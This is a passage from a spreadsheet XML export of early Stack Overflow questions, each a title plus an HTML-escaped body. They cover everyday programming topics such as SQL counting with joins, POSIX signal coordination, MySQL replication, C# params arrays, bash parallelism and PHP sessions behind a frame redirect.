&lt;p&gt;What I want is just the last row of that result:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ParentID    CustID
5            5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I just return the last record generated in the CTE (which would be highest level CustID)?&lt;/p&gt;
&lt;p&gt;Also note that there are multiple unrelated CustID hierarchies in this table so I can't just do a SELECT * FROM tblCustomer WHERE ParentID = CustID. I can't order by ParentID or CustID because the ID number is not related to where it is in the hierarchy.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Print Odd-Even numbers using signals</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to to print natural nos. 1,2,...n such that the parent process prints all odd numbers and the child process prints all even numbers, and all of this needs to be done using POSIX signals. How would I go about accomplishing this?&lt;/p&gt;
&lt;p&gt;The output should be:&lt;/p&gt;
&lt;p&gt;Parent : 1&lt;br&gt;
Child  : 2&lt;br&gt;
Parent : 3&lt;br&gt;
...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mysql software: any suggestions to oversee my mysql replication server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've had a tough time setting up my replication server. Is there any program (OS X, Win, Linux or php no problem) that lets me monitor and resolve replication issues? (btw, for those -uhm- following, ive been on this issue &lt;a href="http://stackoverflow.com/questions/8166/mysql-replication-if-i-dont-specify-any-databases-will-logbin-log-everything" rel="nofollow"&gt;here&lt;/a&gt;, &lt;a href="http://stackoverflow.com/questions/3798/full-complete-mysql-db-replication-ideas-what-do-people-do" rel="nofollow"&gt;here&lt;/a&gt;, &lt;a href="http://stackoverflow.com/questions/8365/mysql-administrator-backups-compatibility-mode-what-exactly-is-this-doing" rel="nofollow"&gt;here&lt;/a&gt; and &lt;a href="http://stackoverflow.com/questions/30660/mysql-binary-log-replication-can-it-be-set-to-ignore-errors" rel="nofollow"&gt;here&lt;/a&gt;. Either i'm going about this the wrong way or i must be immensely thick)&lt;/p&gt;
&lt;p&gt;My production database is several megs in size and growing. Every time the database replication stops and the databases inevitably begin to slide out of sync i cringe. My last resync from dump took almost 4 hours roundtrip!&lt;/p&gt;
&lt;p&gt;As always, even after sync, I run into this kind of show-stopping error":&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error 'Duplicate entry '252440' for key 1' on query.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would love it if there was some way to closely monitor whats going on and perhaps let the software deal with it. I'm even all ears for service companies which may help me monitor my data better. Or an alternate way to mirror altogether.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: going through my previous questions i found &lt;a href="http://stackoverflow.com/questions/30660/mysql-binary-log-replication-can-it-be-set-to-ignore-errors#30889" rel="nofollow"&gt;this&lt;/a&gt; which helps tremendously. I'm still all ears on the monitoring solution.&lt;/p&gt;
&lt;p&gt;cheers,&lt;/p&gt;
&lt;p&gt;/mp&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there static analysis tools for Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am starting to use Python (specifically because of Django) and I would like to remove the burden for exhaustive testing by performing some static analysis.  What tools/parameters/etc. exist to detect issues at compile time that would otherwise show up during runtime? (type errors are probably the most obvious case of this, but undefined variables are another big one that could be avoided with an in-depth analysis of the AST.)&lt;/p&gt;
&lt;p&gt;Obviously testing is important, and I don't imply that tests can be obviated entirely; however, there are many runtime errors in python that are not possible in other languages that perform stricter run-time checking -- I'm hoping that there are tools to bring at least some of these capabilities to python as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I clear Class::DBI's internal cache?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working on a large implementation of Class::DBI for an existing database structure, and am running into a problem with clearing the cache from Class::DBI.  This is a mod_perl implementation, so an instance of a class can be quite old between times that it is accessed.
From the man pages I found two options:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Music::DBI-&amp;gt;clear_object_index();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Music::Artist-&amp;gt;purge_object_index_every(2000);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, when I add clear_object_index() to the DESTROY method, it seems to run, but doesn't actually empty the cache.  I am able to manually change the database, re-run the request, and it is still the old version.
purge_object_index_every says that it clears the index every n requests.  Setting this to "1" or "0", seems to clear the index... sometimes.  I'd expect one of those two to work, but for some reason it doesn't do it every time.  More like 1 in 5 times.&lt;/p&gt;
&lt;p&gt;Any suggestions for clearing this out?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spread vs MPI vs zeromq?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In one of the answers to &lt;a href="http://stackoverflow.com/questions/31572/broadcast-like-udp-with-the-reliability-of-tcp#31629"&gt;Broadcast like UDP with the Reliability of TCP&lt;/a&gt;, a user mentions the &lt;a href="http://spread.org"&gt;Spread&lt;/a&gt; messaging API.  I've also run across one called &lt;a href="http://zeromq.org"&gt;Ã˜MQ&lt;/a&gt;.  I also have some familiarity with &lt;a href="http://www-unix.mcs.anl.gov/mpi/"&gt;MPI&lt;/a&gt;.  &lt;/p&gt;
&lt;p&gt;So, my main question is: why would I choose one over the other?  More specifically, why would I choose to use Spread or Ã˜MQ when there are mature implementations of MPI to be had?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What Are High-Pass and Low-Pass Filters?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Graphics and audio editing and processing software often contain functions called "High-Pass Filter" and "Low-Pass Filter".  Exactly what do these do, and what are the algorithms for implementing them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lazy Loading with a WCF Service Domain Model?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to push my domain model into a WCF Service API and wanted to get some thoughts on lazy loading techniques with this type of setup.&lt;/p&gt;
&lt;p&gt;Any suggestions when taking this approach?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;when I implemented this technique and step into my app, just before the server returns my list it hits the get of each property that is supposed to be lazy loaded ... Thus eager loading. Could you explain this issue or suggest a resolution?&lt;/p&gt;
&lt;p&gt;Edit:  It &lt;a href="http://benders-blog.blogspot.com/2007/01/lazy-loading-in-soa-world.html" rel="nofollow"&gt;appears&lt;/a&gt; you can use the XMLIgnore attribute so it doesnâ€™t get looked at during serialization .. still reading up on this though&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I begin using SVN?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am ready to start using SVN, but I have NO (as in the money required for free beer) experience with source control.  I have installed subversion on my server (that was easy, 'apt-get install subversion') but now I don't know what to do, how to configure it, or how to use it.&lt;br /&gt;&lt;br /&gt;What suggestions do you have, and where can I find good resources to learn to start using it?&lt;br /&gt;&lt;br /&gt;
Update:&lt;br /&gt;
O.K. So the feedback has been great and I have read through a bit of it but I want to clarify my question by saying that I am looking for more information on how to actually go about setting my up my repositories, clients, server, etc.  I know that I could do a quick Google search and find dozens (or more) resources but I'm hoping that someone whom has experience with subversion and a client(I have installed tortoise) could suggest a good reference that will be reliable, and have quality content.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Writing cross-platform apps in C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What things should be kept most in mind when writing cross-platform applications in C? Targeted platforms: 32-bit Intel based PC, Mac, and Linux. I'm especially looking for the type of versatility that Jungle Disk has in their USB desktop edition ( &lt;a href="http://www.jungledisk.com/desktop/download.aspx"&gt;http://www.jungledisk.com/desktop/download.aspx&lt;/a&gt; )&lt;/p&gt;
&lt;p&gt;What are tips and "gotchas" for this type of development?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting started with SideShow Devices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a recommendation for a hardware platform for developing/testing SideShow devices, or is the Emulator adequate?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Comparison of Lat, Long Coordinates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a list of more than 15 thousand latitude and longitude coordinates.  Given any X,Y coordinates, what is the fastest way to find the closest coordinates on the list?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Elegant Snippets of F#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently learning F# quite intensively. I really love it as a language, it just sort of 'feels' right and seems to allow you to produce some succint elegant code.&lt;/p&gt;
&lt;p&gt;I'm interested in finding some really nice 'wow factor' snippets of F# code which demonstate the elegence of the language, especially compared to C#. For example I really like:-&lt;/p&gt;
&lt;pre&gt;
#light
let ListProduct l = List.fold_left (*) 1 l
&lt;/pre&gt;
&lt;p&gt;Which inputs a list of ints and multiplies each element in the list, i.e. obtains the product of the list (e.g. a list of 1,2,3 would be calculated as 1*2*3=6). The closest C# equivilent, using LINQ and functional concepts is as follows:-&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Collections.Generic;
using System.Linq;
...
public static class ListHelper {
  public static int ListProduct(List&amp;lt;int&amp;gt; l) {
    return l.Aggregate(1, (i, j) =&amp;gt; i * j);
  }
}    
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Before LINQ that would have been:-&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Collections.Generic;
...
public static class ListHelper {
  public static int ListProduct(List&amp;lt;int&amp;gt; l) {
    int ret = 1;
    foreach (int i in l) ret *= i;
    return ret;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm certainly not trying to criticise C# here, I think it's a wonderful language, it's just nice to see how F# compares and to see how it can do some things more elegantly - does anyone have anything really nice?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I don't understand std::tr1::unordered_map</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need an associative container that makes me index a certain object through a string, but that also keeps the order of insertion, so I can look for a specific object by its name or just iterate on it and retrieve objects in the same order I inserted them.&lt;/p&gt;
&lt;p&gt;I think this &lt;a href="http://www.ddj.com/cpp/184406207" rel="nofollow"&gt;hybrid of linked list and hash map&lt;/a&gt; should do the job, but before I tried to use &lt;code&gt;std::tr1::unordered_map&lt;/code&gt; thinking that it was working in that way I described, but it wasn't. So could someone explain me the meaning and behavior of &lt;code&gt;unordered_map&lt;/code&gt;?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;@wesc: I'm sure std::map is implemented by STL, while I'm sure std::hash_map is NOT in the STL (I think older version of Visual Studio put it in a namespace called stdext).&lt;/p&gt;
&lt;p&gt;@cristopher: so, if I get it right, the difference is in the implementation (and thus performances), not in the way it behaves externally.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Yaws uses old config file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing a web app on Yaws 1.65 (installed through apt) running on Debian etch on a VPS with UML.  Whenever I do /etc/init.d/yaws restart or a stop/start, it initializes according to an old version of the config file (/etc/yaws/yaws.conf).&lt;/p&gt;
&lt;p&gt;I know this because I changed the docroot from the default to another directory (call it A), then a few weeks later changed it to directory B, and the config file has stayed with B for the last several months.  But then, after a restart, it switches back to A.  If it switched back to the package default, that would be understandable, but it switches to an old customized version instead.&lt;/p&gt;
&lt;p&gt;The funny thing is that if I leave it stopped for several minutes, when I start it again, everything switches back to normal (using directory B).  But while it's stopped, if I run ps, I don't see any yaws-related processes (yaws, heart, etc).  This problem has survived several reboots, so it's got to be an old cached copy of the config somewhere, but I have yet to find anything like that.&lt;/p&gt;
&lt;p&gt;Any idea what could be going on?&lt;/p&gt;
&lt;p&gt;Update:
@Gorgapor - I stopped yaws, renamed the config file and tried to start it again.  It failed to start.  However, I was able to restart a couple of times and this time it didn't switch back to the old version.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dealing with circular dependencies in OCaml</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing an interpreter for an experimental language. Three of the main constructs of the language are definitions, statements, and expressions. Definitions can contain statements and expressions, statements can contain definitions and expressions, and one kind of expression can contain statements. I represent all of these using union types so I can easily use pattern matching on them. Ideally, I would like to put the code for these in different files, but OMake complains about circular dependency issues. As far as I know, circular type definitions across modules are not allowed.&lt;/p&gt;
&lt;p&gt;The only way I know of to solve this is to define all three types at once:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;type defn = ...
and stmt = ...
and expr = ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems like this requires all the code for types to be in the same file. Is there any way around this? How do you deal with circular definitions in your code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to pass a single object[] to a params object[]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a method which takes params object[] such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void Foo(params object[] items)
{
    Console.WriteLine(items[0]);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I pass two object arrays to this method, it works fine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Foo(new object[]{ (object)"1", (object)"2" }, new object[]{ (object)"3", (object)"4" } );
// Output: System.Object[]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But when I pass a single object[], it does not take my object[] as the first param, instead it takes its all elements like I wanted to pass them one by one:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Foo(new object[]{ (object)"1", (object)"2" });
// Output: 1, expected: System.Object[]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I pass a single object[] as a first argument to a params array?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the important Ruby commands?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm not sure of all of them, but what are the commands to do things like update Ruby, download a new gem, or update an existing gem? What other important things are there?&lt;/p&gt;
&lt;p&gt;Since it might matter, I'm running Windows.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Viewing DirectX application remotely</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're working on an application that displays information through a Direct3D visualisation. A late client request is the ability to view this application via some Remote Desktop solution.&lt;/p&gt;
&lt;p&gt;Has anyone done anything similar? What options are available / unavailable? I'm thinking RDC, VNC, Citrix...&lt;/p&gt;
&lt;p&gt;Any advice?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Query, Count with 0 count</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have three tables: page, attachment, page-attachment&lt;/p&gt;
&lt;p&gt;I have data like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;page
ID    NAME
1     first page
2     second page
3     third page
4     fourth page
attachment
ID    NAME
1     foo.word
2     test.xsl
3     mm.ppt
page-attachment
ID    PAGE-ID   ATTACHMENT-ID
1     2         1
2     2         2
3     3         3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to get the number of attachments per page &lt;strong&gt;also when that number is 0&lt;/strong&gt;. I have tried with: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select page.name, count(page-attachment.id) as attachmentsnumber 
from page 
    inner join page-attachment on page.id=page-id 
group by page.id
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am getting this output: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NAME        ATTACHMENTSNUMBER
second page  2
third page   1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to get this output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NAME        ATTACHMENTSNUMBER
first page   0
second page  2
third page   1
fourth page  0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I get the 0 part?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Version Control for word documents</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How would people recommend doing version control for word documents? Is the in build control up to the job or is it better to rely on dedicated version control systems, and if so, which ones?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Changing a CORBA interface without recompiling</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to add a method to my existing server's CORBA interface. Will that require recompiling all clients?&lt;/p&gt;
&lt;p&gt;I'm using TAO.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to best implement software updates on windows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to implement an "automatic update" system for  a windows application. 
Right now I'm semi-manually creating an &lt;a href="http://connectedflow.com/appcasting/"&gt;"appcast"&lt;/a&gt; which my program checks, and notifies the user that a new version is available. (I'm using
 &lt;a href="http://nsis.sourceforge.net/Main_Page"&gt;NSIS&lt;/a&gt; for my installers).&lt;/p&gt;
&lt;p&gt;Is there software that I can use that will handle the "automatic" part of the updates, perhaps similar to  &lt;a href="http://sparkle.andymatuschak.org/"&gt;Sparkle&lt;/a&gt; on the mac? Any issues/pitfalls that I should be aware of?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the meaning of "non temporal" memory accesses in x86</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a somewhat low-level question.  In x86 assembly there are two SSE instructions: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;code&gt;MOVDQA &lt;i&gt;&lt;em&gt;xmmi, m128&lt;/em&gt;&lt;/i&gt;&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;and  &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;code&gt;MOVNTDQA &lt;i&gt;&lt;em&gt;xmmi, m128&lt;/em&gt;&lt;/i&gt;&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The IA-32 Software Developer's Manual says that the &lt;em&gt;NT&lt;/em&gt; in MOVNTDQA stands for &lt;em&gt;Non-Temporal&lt;/em&gt;, and that otherwise it's the same as MOVDQA.&lt;/p&gt;
&lt;p&gt;My question is, what does &lt;em&gt;Non-Temporal&lt;/em&gt; mean?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Checking the results of a Factory in a unit test</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have developed some classes with similar behavior, they all implement the same interface.  I implemented a factory that creates the appropriate object and returns the interface.  I am writing a unit test for the factory.  All you get back is an interface to the object.
What is the best way to test that the factory has worked correctly?&lt;/p&gt;
&lt;p&gt;I would like to know the answer in Java, but if there is a solution that crosses languages I would like to know it.&lt;/p&gt;
&lt;p&gt;Number 2. in the answer, would be done like the other answer?  If so I will mark the other answer accepted as well and reword my question to adress both a factory where an interface is returned and you have no clue what type of concrete class implemented the interface, and the case where you do know what concrete class was used.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convert .ICO to .PNG?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tool can I use to convert a .ICO file to a .PNG file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best GUI tool for documenting a SQL Server DB</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tool(s) do you use to generate documentation for a database (preferably into a .chm help file)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to implement a file download in asp.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to implement, from a web page a download action using asp.net 2.0?&lt;/p&gt;
&lt;p&gt;Log files for a action are created in a directory called [Application Root]/Logs.  I have the full path and want to provide a button, that when clicked will download the log file from the IIS server to the users local pc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I implement a chromeless window with WPF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to show a chromeless modal window with a close button in the upper right corner.
Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you display a dialog from a hidden window application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have developed a COM component (dll) that implements an Edit() method displaying a WTL modal dialog.&lt;/p&gt;
&lt;p&gt;The complete interface to this COM component corresponds to a software standard used in the chemical process industry (CAPE-OPEN) and as a result this COM component is supposed to be usable by a range of 3rd party executables that are out of my control.&lt;/p&gt;
&lt;p&gt;My component works as expected in many of these EXEs, but for one in particular the Edit() method just hangs without the dialog appearing.&lt;/p&gt;
&lt;p&gt;However, if I make a call to &lt;code&gt;::MessageBox()&lt;/code&gt; immediately before &lt;code&gt;DoModal()&lt;/code&gt; the dialog displays and behaves correctly after first showing the MessageBox.&lt;/p&gt;
&lt;p&gt;I have a suspicion that the problem may be something to do with this particular EXE running as a 'hidden window application'.&lt;/p&gt;
&lt;p&gt;I have tried using both NULL and the return value from &lt;code&gt;::GetConsoleWindow()&lt;/code&gt; as the dialog's parent, neither have worked.&lt;/p&gt;
&lt;p&gt;The dialog itself is an ATL/WTL CPropertySheetImpl.&lt;/p&gt;
&lt;p&gt;The parent application (EXE) in question is out of my control as it is developed by a (mildly hostile) 3rd party.&lt;/p&gt;
&lt;p&gt;I do know that I can successfully call &lt;code&gt;::MessageBox()&lt;/code&gt; or display the standard Windows File Dialog from my COM component, and that after doing so I am then able to display my custom dialog. I'm just unable to display my custom dialog without first displaying a 'standard' dialog.&lt;/p&gt;
&lt;p&gt;Can anyone suggest how I might get it to display the dialog without first showing an unnecessary MessageBox? I know it is possible because I've seen this EXE display the dialogs from other COM components corresponding to the same interface.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# string concatenation and string interning</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When performing string concatentation of an existing string in the intern pool, is a new string entered into the intern pool or is a reference returned to the existing string in the intern pool? According to this article, String.Concat and StringBuilder will insert new string instances into the intern pool? &lt;/p&gt;
&lt;p&gt;&lt;a href="http://community.bartdesmet.net/blogs/bart/archive/2006/09/27/4472.aspx" rel="nofollow"&gt;http://community.bartdesmet.net/blogs/bart/archive/2006/09/27/4472.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Can anyone explain how concatenation works with the intern pool?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best .NET Wrapper for Google Maps or Yahoo Maps?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to do a quick demo app using Google Maps (or Yahoo Maps, or any similar service).  So far I haven't had much luck finding .NET wrappers for any of these services.&lt;/p&gt;
&lt;p&gt;Any suggestions or pointers?&lt;/p&gt;
&lt;p&gt;I'm not opposed to using the native javascript api to do this, but I assumed someone would have already written a wrapper to easily integrate this into an ASP.NET application.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to prevent Write Ahead Logging on just one table in PostgreSQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am considering log-shipping of &lt;a href="http://www.postgresql.org/docs/8.2/static/runtime-config-wal.html"&gt;Write Ahead Logs (WAL)&lt;/a&gt; in PostgreSQL to create a warm-standby database. However I have one table in the database that receives a huge amount of INSERT/DELETEs each day, but which I don't care about protecting the data in it. To reduce the amount of WALs produced I was wondering, &lt;strong&gt;is there a way to prevent any activity on one table from being recorded in the WALs?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parallelize Bash Script with maximum number of processes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Lets say I have a loop in bash:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for foo in `some-command`
do
   do-something $foo
done
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;do-something&lt;/code&gt; is cpu bound and I have a nice shiny 4 core processor. I'd like to be able to run up to 4 &lt;code&gt;do-something&lt;/code&gt;'s at once.&lt;/p&gt;
&lt;p&gt;The naive approach seems to be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for foo in `some-command`
do
   do-something $foo &amp;amp;
done
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will run &lt;em&gt;all&lt;/em&gt; &lt;code&gt;do-something&lt;/code&gt;s at once, but there are a couple downsides, mainly that do-something may also have some significant I/O which performing &lt;em&gt;all&lt;/em&gt; at once might slow down a bit. The other problem is that this code block returns immediately, so no way to do other work when all the &lt;code&gt;do-something&lt;/code&gt;s are finished.&lt;/p&gt;
&lt;p&gt;How would you write this loop so there are always X &lt;code&gt;do-something&lt;/code&gt;s running at once?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I read a disk directly with .Net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is is possible to read a disk directly with .Net?  By directly I mean via the device bypassing the file system.  I think I would go about this by opening the device some way "\Device\Ide\IdeDeviceP2T0L0-1" for example. &lt;/p&gt;
&lt;p&gt;If I can't open the device with a .NET api knowing which Win32 API to use would be helpful.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What non-programming books should programmers read?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a &lt;a href="http://stackoverflow.com/questions/tagged/polls"&gt;poll&lt;/a&gt; asking the Stackoverflow community what &lt;strong&gt;non-programming&lt;/strong&gt; books they would recommend to fellow programmers.&lt;/p&gt;
&lt;h3&gt;Please read the following before posting:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Please post only &lt;em&gt;ONE BOOK PER ANSWER&lt;/em&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Please &lt;em&gt;search for your recommendation on this page before posting&lt;/em&gt; (there are over NINE PAGES so it is advisable to check them all). Many books have already been suggested and we want to avoid duplicates. If you find your recommendation is already present, vote it up or add some commentary.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Please elaborate&lt;/strong&gt; &lt;em&gt;on &lt;strong&gt;why&lt;/strong&gt; you think a given book is worth reading&lt;/em&gt; &lt;strong&gt;&lt;em&gt;from a programmer's perspective.&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note: &lt;a href="http://stackoverflow.com/questions/31274/best-non-development-book-for-software-developers"&gt;this article&lt;/a&gt; is similar and contains other useful suggestions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best browser for web application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in a position where I can choose the client browser for my web app. The app is being used internally, and we are installing each client "manually".I would like to find a better solution for the browser,so :&lt;/p&gt;
&lt;p&gt;What is a good browser that I can use as a client to a web application?&lt;/p&gt;
&lt;p&gt;General functionalities I would like to have:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;opening the browser from a
shortcut, directly to the application's URL &lt;/li&gt;
&lt;li&gt;ability to restrict navigation to a set of allowed URLs &lt;/li&gt;
&lt;li&gt;fullscreen mode, no menu, no address bar&lt;/li&gt;
&lt;li&gt;javascript &lt;/li&gt;
&lt;li&gt;good CSS support&lt;/li&gt;
&lt;li&gt;ability to cancel Back button (or at least solve the "Webpage has expired" IE problem)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;IE7 and FireFox are good candidates, but each seem to have it's own problems and issues.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP : session variable aren't usable when site is redirected</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've to admin a small website for my alumni group which is hosted by my ISV. The url is something like www.myIsv.com/myWebSite/ which is quite ugly and very forgetable. The main admin of the webserver has registered a domain name www.mysmallwebsite.com and put a index.html with this content:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;title&amp;gt;www.mysmallwebsite.com&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;frameset&amp;gt;
   &amp;lt;frame src="http://www.myIsv.com/myWebSite/" name="redir"&amp;gt;
      &amp;lt;noframes&amp;gt;
        &amp;lt;p&amp;gt;Original location:
          &amp;lt;a href="www.myIsv.com/myWebSite/"&amp;gt;http://www.myIsv.com/myWebSite/&amp;lt;/a&amp;gt;
        &amp;lt;/p&amp;gt;
      &amp;lt;/noframes&amp;gt;
 &amp;lt;/frameset&amp;gt;  
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It works fine, but some features like PHP Session variables doesn't work anymore! Anyone has a suggestion for correcting that?&lt;/p&gt;
&lt;p&gt;Edit:
This doesn't work both on IE and on Firefox (no plugins)&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# WinForms - DataGridView/SQL Compact - Negative integer in primary key column</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just getting dirty in WinForms, and I've discovered, through a lovely tutorial, the magic of dragging a database table onto the design view of my main form. So, all is lovely, I've got my DataGridView with all of the columns represented beautifully.&lt;/p&gt;
&lt;p&gt;BUT...&lt;/p&gt;
&lt;p&gt;When I run my application against this brand new, empty .sdf (empty save for the two tables I've created, which are themselves empty), I get a -1 in the column corresponding to my primary key/identity column whenever I try to create that first record.&lt;/p&gt;
&lt;p&gt;Any idea why this might be happening? If it helps, the column is an &lt;code&gt;int&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET controls cannot be referenced in code-behind in Visual Studio 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, so, my visual studio is broken. I say this NOT prematurely, as it was my first response to see where I had messed up in my code. When I add controls to the page I can't reference all of them in the code behind. Some of them I can, it seems that the first few I put on a page work, then it just stops. &lt;/p&gt;
&lt;p&gt;I first thought it may be the type of control as initially I was trying to reference a repeater inside an update panel. I know I am correctly referencing the code behind in my aspx page. But just in case it was a  screw up on my part I started to recreate the page from scratch and this time got a few more controls down before VS stopped recognizing my controls.&lt;/p&gt;
